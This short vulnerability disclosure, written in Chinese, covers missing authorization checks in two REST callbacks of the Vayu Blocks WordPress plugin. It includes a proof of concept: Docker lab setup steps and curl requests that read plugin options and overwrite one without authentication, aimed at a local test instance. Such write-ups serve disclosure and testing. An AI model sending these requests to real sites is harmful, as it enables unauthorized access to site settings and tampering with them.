Vayu Blocks – Gutenberg Blocks 用于 WordPress 和 WooCommerce 的插件存在未授权访问和数据修改漏洞,原因是 vayu_blocks_get_toggle_switch_values_callback 和 vayu_blocks_save_toggle_switch_callback 函数在 1.0.4 至 1.2.1 版本中缺少权限检查。这使得未认证的攻击者能够读取插件选项,并更新任何键名以 _value 结尾的选项。
cd vuln-wordpress
docker-compose up -d
cd wp-content/plugins/
unzip vayu-blocks.1.2.0.zip
curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
-H "Content-Type: application/json" \
-d '{"key":"container", "value":"new_value"}'